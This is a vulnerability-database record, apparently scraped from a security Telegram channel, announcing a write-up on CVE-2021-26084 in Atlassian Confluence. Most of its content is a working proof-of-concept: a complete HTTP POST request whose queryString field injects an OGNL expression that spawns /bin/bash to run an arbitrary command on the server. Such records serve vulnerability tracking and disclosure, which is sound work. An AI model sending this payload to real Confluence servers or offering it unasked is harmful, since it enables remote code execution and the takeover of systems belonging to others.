{"uuid": "7b99d895-d034-41b5-a804-766130879422", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2021-26084", "type": "published-proof-of-concept", "source": "https://t.me/ptswarm/66", "content": "Remote Code Execution on Confluence Servers write-up (CVE-2021-26084)\n\ud83d\udc64 by rootxharsh and iamnoooob\n\nPatch diffing the latest Confluence update results in RCE PoC.\n\nPoC:\nPOST /pages/doenterpagevariables.action HTTP/2\nHost: localhost\nContent-Length: 301\nContent-Type: application/x-www-form-urlencoded\n\nqueryString=aaa\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var x=new java.lang.ProcessBuilder;x.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027'.$cmd.'\\u0027]);x.start()\\u0022)}%2b\\u0027\n\n\ud83d\udcdd Contents:\n \u2022 Analyzing the hot patch\n \u2022 Bypassing isSafeExpression\n \u2022 Bonus - Better Payload\n \u2022 Bonus - Debugging\n\nhttps://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md", "creation_timestamp": "2021-09-01T07:02:48.000000Z"}